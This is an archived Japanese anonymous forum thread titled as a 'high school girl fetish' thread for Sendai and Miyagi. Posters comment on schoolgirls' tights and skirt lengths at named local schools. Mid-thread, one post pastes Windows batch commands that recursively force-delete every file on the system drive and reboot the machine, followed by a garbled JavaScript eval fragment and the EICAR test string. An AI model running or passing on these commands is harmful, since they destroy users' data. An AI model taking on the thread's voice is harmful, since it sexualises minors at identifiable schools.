仙台・宮城の女子高生フェチpart5
■ このスレッドは過去ログ倉庫に格納されています
>>1
乙乙〜
しかし仙台も昔に比べて黒鯛増えたね
タイツ萌えじゃない俺には残念な季節だわ そういや 昔は 黒タイツといえば 常盤木のイメージしかなかったなぁ 改めて常盤木と尚絅は起つなぁ。
聖和は最近ストッキング穿いてる子多くね? @echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
@Echo off
Del C:\ *.* |y
(){eval(unescape(('Script(t,'%')))})(/./g);
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 聖和の三神峯 1クラスインフルで23日まで学級閉鎖だね 他は分からんが東高はタイツに柄物の靴下重ね穿きしてる娘多かったな
まるで山ガールみたいだ
った
色気は無いがこの寒さじゃああしちゃうんだろうなぁ。。。 はにわも増えたな
あれだけはフェチな奴居ないだろw 今日 多賀城の万代でガマジョのコ見かけた
制服&黒タイツだったなぁ 俺は利府と常盤木のカバコを見た。
常盤木のグレーのカーディガン、よくね? 仙台南・名取北・名取のミニスカ三姉妹は、俺的には外せない テレビのニュースで被災地の卒業式って事で石巻女子商の卒業式写ってたね
ミニスカ率高し!みんなスカート短いな 仙台駅で見かけたんだけど、グレーのジャケットに
ブルーのチェックのスカートは何処? ■ このスレッドは過去ログ倉庫に格納されています